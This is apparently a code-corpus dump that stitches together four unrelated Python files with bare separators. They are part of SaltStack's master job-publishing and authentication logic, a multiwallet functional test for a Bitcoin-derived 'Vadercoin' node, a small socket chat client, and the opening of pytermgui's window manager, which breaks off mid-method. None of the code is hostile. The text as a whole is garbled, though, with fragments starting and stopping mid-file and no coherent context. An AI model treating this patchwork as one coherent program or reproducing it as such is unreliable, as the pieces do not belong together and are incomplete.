log.debug('Minion tokenized user = "%s"', username)
elif auth_type == "eauth":
# The username we are attempting to auth with
clear_load["user"] = self.loadauth.load_name(extra)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get("order_masters"):
# Check for no minions
if not minions:
return {
"enc": "clear",
"load": {
"jid": None,
"minions": minions,
"error": "Master could not resolve minions for target {}".format(
clear_load["tgt"]
),
},
}
jid = self._prep_jid(clear_load, extra)
if jid is None:
return {"enc": "clear", "load": {"error": "Master failed to assign jid"}}
payload = self._prep_pub(minions, jid, clear_load, extra, missing)
# Send it!
self._send_ssh_pub(payload, ssh_minions=ssh_minions)
self._send_pub(payload)
return {
"enc": "clear",
"load": {"jid": clear_load["jid"], "minions": minions, "missing": missing},
}
def _prep_auth_info(self, clear_load):
sensitive_load_keys = []
key = None
if "token" in clear_load:
auth_type = "token"
err_name = "TokenAuthenticationError"
sensitive_load_keys = ["token"]
elif "eauth" in clear_load:
auth_type = "eauth"
err_name = "EauthAuthenticationError"
sensitive_load_keys = ["username", "password"]
else:
auth_type = "user"
err_name = "UserAuthenticationError"
key = self.key
return auth_type, err_name, key, sensitive_load_keys
def _prep_jid(self, clear_load, extra):
"""
Return a jid for this publication
"""
# the jid in clear_load can be None, '', or something else. this is an
# attempt to clean up the value before passing to plugins
passed_jid = clear_load["jid"] if clear_load.get("jid") else None
nocache = extra.get("nocache", False)
# Retrieve the jid
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
try:
# Retrieve the jid
jid = self.mminion.returners[fstr](nocache=nocache, passed_jid=passed_jid)
except (KeyError, TypeError):
# The returner is not present
msg = (
"Failed to allocate a jid. The requested returner '{}' "
"could not be loaded.".format(fstr.split(".")[0])
)
log.error(msg)
return {"error": msg}
return jid
def _send_pub(self, load):
"""
Take a load and send it across the network to connected minions
"""
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.publish(load)
@property
def ssh_client(self):
if not hasattr(self, "_ssh_client"):
self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts)
return self._ssh_client
def _send_ssh_pub(self, load, ssh_minions=False):
"""
Take a load and send it across the network to ssh minions
"""
if self.opts["enable_ssh_minions"] is True and ssh_minions is True:
log.debug("Send payload to ssh minions")
threading.Thread(target=self.ssh_client.cmd, kwargs=load).start()
def _prep_pub(self, minions, jid, clear_load, extra, missing):
"""
Take a given load and perform the necessary steps
to prepare a publication.
TODO: This is really only bound by temporal cohesion
and thus should be refactored even further.
"""
clear_load["jid"] = jid
delimiter = clear_load.get("kwargs", {}).get("delimiter", DEFAULT_TARGET_DELIM)
# TODO Error reporting over the master event bus
self.event.fire_event({"minions": minions}, clear_load["jid"])
new_job_load = {
"jid": clear_load["jid"],
"tgt_type": clear_load["tgt_type"],
"tgt": clear_load["tgt"],
"user": clear_load["user"],
"fun": clear_load["fun"],
"arg": clear_load["arg"],
"minions": minions,
"missing": missing,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, tagify([clear_load["jid"], "new"], "job"))
if self.opts["ext_job_cache"]:
fstr = "{}.save_load".format(self.opts["ext_job_cache"])
save_load_func = True
# Get the returner's save_load arg_spec.
try:
arg_spec = salt.utils.args.get_function_argspec(
self.mminion.returners[fstr]
)
# Check if 'minions' is included in returner's save_load arg_spec.
# This may be missing in custom returners, which we should warn about.
if "minions" not in arg_spec.args:
log.critical(
"The specified returner used for the external job cache "
"'%s' does not have a 'minions' kwarg in the returner's "
"save_load function.",
self.opts["ext_job_cache"],
)
except (AttributeError, KeyError):
save_load_func = False
log.critical(
"The specified returner used for the external job cache "
'"%s" does not have a save_load function!',
self.opts["ext_job_cache"],
)
if save_load_func:
try:
self.mminion.returners[fstr](
clear_load["jid"], clear_load, minions=minions
)
except Exception: # pylint: disable=broad-except
log.critical(
"The specified returner threw a stack trace:\n", exc_info=True
)
# always write out to the master job caches
try:
fstr = "{}.save_load".format(self.opts["master_job_cache"])
self.mminion.returners[fstr](clear_load["jid"], clear_load, minions)
except KeyError:
log.critical(
"The specified returner used for the master job cache "
'"%s" does not have a save_load function!',
self.opts["master_job_cache"],
)
except Exception: # pylint: disable=broad-except
log.critical("The specified returner threw a stack trace:\n", exc_info=True)
# Set up the payload
payload = {"enc": "aes"}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
"fun": clear_load["fun"],
"arg": clear_load["arg"],
"tgt": clear_load["tgt"],
"jid": clear_load["jid"],
"ret": clear_load["ret"],
}
# if you specified a master id, lets put that in the load
if "master_id" in self.opts:
load["master_id"] = self.opts["master_id"]
# if someone passed us one, use that
if "master_id" in extra:
load["master_id"] = extra["master_id"]
# Only add the delimiter to the pub data if it is non-default
if delimiter != DEFAULT_TARGET_DELIM:
load["delimiter"] = delimiter
if "id" in extra:
load["id"] = extra["id"]
if "tgt_type" in clear_load:
load["tgt_type"] = clear_load["tgt_type"]
if "to" in clear_load:
load["to"] = clear_load["to"]
if "kwargs" in clear_load:
if "ret_config" in clear_load["kwargs"]:
load["ret_config"] = clear_load["kwargs"].get("ret_config")
if "metadata" in clear_load["kwargs"]:
load["metadata"] = clear_load["kwargs"].get("metadata")
if "module_executors" in clear_load["kwargs"]:
load["module_executors"] = clear_load["kwargs"].get("module_executors")
if "executor_opts" in clear_load["kwargs"]:
load["executor_opts"] = clear_load["kwargs"].get("executor_opts")
if "ret_kwargs" in clear_load["kwargs"]:
load["ret_kwargs"] = clear_load["kwargs"].get("ret_kwargs")
if "user" in clear_load:
log.info(
"User %s Published command %s with jid %s",
clear_load["user"],
clear_load["fun"],
clear_load["jid"],
)
load["user"] = clear_load["user"]
else:
log.info(
"Published command %s with jid %s", clear_load["fun"], clear_load["jid"]
)
log.debug("Published command details %s", load)
return load
def ping(self, clear_load):
"""
Send the load back to the sender.
"""
return clear_load
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Vadercoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a vadercoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import VadercoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(VadercoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another vadercoind?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=COINBASE_MATURITY + 1, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another vadercoind?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
client.py
|
import socket
import threading
def welcome():
print("Nice to see you! Enter your nickname: ")
nickname = input()
print(f"{nickname} burst into the party")
return nickname
class Client:
def __init__(self, host: str, port: int, username: str):
self.host = host
self.port = port
self.username = username
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def get_message(self):
while True:
try:
data = self.sock.recv(1024)
udata = data.decode("utf-8")
print(udata)
except KeyboardInterrupt:
self.sock.close()
def send_message(self):
while True:
try:
data = input()
self.sock.send(f"{self.username} says: {data}".encode())
except KeyboardInterrupt:
self.sock.close()
def run(self):
self.sock.connect((self.host, self.port))
thread2, thread1 = threading.Thread(target=self.get_message), threading.Thread(target=self.send_message)
thread1.start()
thread2.start()
|
window_manager.py
|
"""
Description
-----------
A full implementation of a WindowManager for the terminal, building on top
of the Widget system.
It runs with no external dependencies, and has full mouse support. It is the
simplest way to use pytermgui in your applications, as it handles all input
and output in a nice and optimized manner.
It runs in two threads:
- Main thread (blocking): `WindowManager.process_input`
- WM_DisplayLoop (non-blocking): `WindowManager._start_display_thread`
Usage example
-------------
```python3
import pytermgui as ptg
with ptg.WindowManager() as manager:
manager.add(
ptg.Window()
+ "[wm-title]Hello world!"
+ ""
+ {"[wm-section]Key1": ["value1", lambda *_: manager.alert("Value1")]}
+ {"[wm-section]Key2": ["value2", lambda *_: manager.alert("Value2")]}
+ ""
+ ptg.InputField(prompt="Your input:")
+ ""
+ ["Submit!", lambda *_: manager.alert("Form submitted!")]
)
manager.run()
```
<img src=https://github.com/bczsalba/pytermgui/blob/master/assets/docs/wm_demo.gif?raw=true
style="max-width: 100%">
"""
# These object need more than 7 attributes.
# pylint: disable=too-many-instance-attributes
from __future__ import annotations
import sys
import time
import signal
from threading import Thread
from enum import Enum, auto as _auto
from typing import Optional, Any
# https://github.com/python/mypy/issues/4930
from .widgets.layouts import Container
from .widgets import (
MarkupFormatter,
Widget,
boxes,
)
from .input import getch
from .parser import markup
from .animations import animator
from .helpers import strip_ansi, real_length
from .enums import CenteringPolicy, SizePolicy, Overflow
from .context_managers import alt_buffer, mouse_handler, MouseTranslator, cursor_at
from .ansi_interface import (
terminal,
background,
MouseEvent,
move_cursor,
MouseAction,
)
__all__ = ["Window", "WindowManager"]
class Edge(Enum):
"""Enum for window edges."""
LEFT = _auto()
TOP = _auto()
RIGHT = _auto()
BOTTOM = _auto()
class Window(Container):
"""A class representing a window.
Windows are essentially fancy `pytermgui.widgets.Container`-s. They build on top of them
to store and display various widgets, while allowing some custom functionality.
"""
is_bindable = True
overflow = Overflow.HIDE
allow_fullscreen = False
"""When a window is allowed fullscreen its manager will try to set it so before each frame."""
title = ""
"""Title shown in left-top corner."""
is_static = False
"""Static windows cannot be moved using the mouse."""
is_modal = False
"""Modal windows stay on top of every other window and block interactions with other windows."""
is_noblur = False
"""No-blur windows will always appear to stay in focus, even if they functionally don't."""
is_noresize = False
"""No-resize windows cannot be resized using the mouse."""
is_dirty = False
"""Control whether the parent manager needs to print this Window."""
min_width: int | None = None
"""Minimum width of the window.
If set to none, _auto_min_width will be calculated based on the maximum width of inner widgets.
This is accurate enough for general use, but tends to lean to the safer side, i.e. it often
overshoots the 'real' minimum width possible.
If you find this to be the case, **AND** you can ensure that your window will not break, you
may set this value manually."""
styles = {**Container.styles, **{"title": MarkupFormatter("[wm-title]{item}")}}
chars = Container.chars.copy()
def __init__(self, *widgets: Any, **attrs: Any) -> None:
"""Initializes object.
Args:
widgets: Widgets to add to this window after initilization.
attrs: Attributes that are passed to the constructor.
"""
self._auto_min_width = 0
super().__init__(*widgets, **attrs)
self.has_focus: bool = False
self.manager: Optional[WindowManager] = None
# ------------------------- position ----- width x height
self._restore_data: tuple[tuple[int, int], tuple[int, int]] | None = None
if self.title != "":
self.set_title(self.title)
@property
def rect(self) -> tuple[int, int, int, int]:
"""Returns the tuple of positions that define this window.
Returns:
A tuple of integers, in the order (left, top, right, bottom).
"""
left, top = self.pos
return (left, top, left + self.width, top + self.height)
@rect.setter
def rect(self, new: tuple[int, int, int, int]) -> None:
"""Sets new position, width and height of this window.
This method also checks for the minimum width this window can be, and
if the new width doesn't comply with that setting the changes are thrown
away.
Args:
new: A tuple of integers in the order (left, top, right, bottom).
"""
left, top, right, bottom = new
minimum = self.min_width or self._auto_min_width
if right - left < minimum:
return
# Update size policy to fill to resize inner objects properly
self.size_policy = SizePolicy.FILL
self.pos = (left, top)
self.width = right - left
self.height = bottom - top
# Restore original size policy
self.size_policy = SizePolicy.STATIC
def __iadd__(self, other: object) -> Window:
"""Calls self._add_widget(other) and returns self."""
self._add_widget(other)
return self
def __add__(self, other: object) -> Window:
"""Calls self._add_widget(other) and returns self."""
self._add_widget(other)
return self
def _add_widget(self, other: object, run_get_lines: bool = True) -> Widget:
"""Adds a widget to the window.
Args:
other: The widget-like to add.
run_get_lines: Whether self.get_lines should be ran after adding.
"""
added = super()._add_widget(other, run_get_lines)
if self.min_width is None and len(self._widgets) > 0:
self._auto_min_width = max(widget.width for widget in self._widgets)
self._auto_min_width += self.sidelength
self.height += added.height
return added
def nullify_cache(self) -> None:
"""Nullifies manager's cached blur state."""
if self.manager is not None:
self.manager.nullify_cache(self)
def contains(self, pos: tuple[int, int]) -> bool:
"""Determines whether widget contains `pos`.
This method uses window.rect to get the positions.
Args:
pos: Position to compare.
Returns:
Boolean describing whether the position is inside
this widget.
"""
left, top, right, bottom = self.rect
return left <= pos[0] < right and top <= pos[1] < bottom
def set_title(self, title: str, position: int = 0, pad: bool = True) -> None:
"""Sets the window's title.
Args:
title: The string to set as the window title.
position: An integer indexing into ["left", "top", "right", "bottom"],
determining where the title is applied.
pad: Whether there should be an extra space before and after the given title.
defaults to True.
"""
self.title = title
title = "[wm-title]" + title
if pad:
title = " " + title + " "
corners = self._get_char("corner")
assert isinstance(corners, list)
if position % 2 == 0:
corners[position] += title
else:
current = corners[position]
corners[position] = title + current
self.set_char("corner", corners)
def set_fullscreen(self, value: bool = True) -> Window:
"""Sets window to fullscreen.
Args:
value: Whether fullscreen should be set or unset.
Returns:
The same window.
"""
if value:
self._restore_data = self.pos, (self.width, self.height)
self.pos = terminal.origin
self.allow_fullscreen = True
self.size_policy = SizePolicy.FILL
else:
assert self._restore_data is not None
self.pos, (self.width, self.height) = self._restore_data
self._restore_data = None
self.allow_fullscreen = False
self.size_policy = SizePolicy.STATIC
return self
def center(
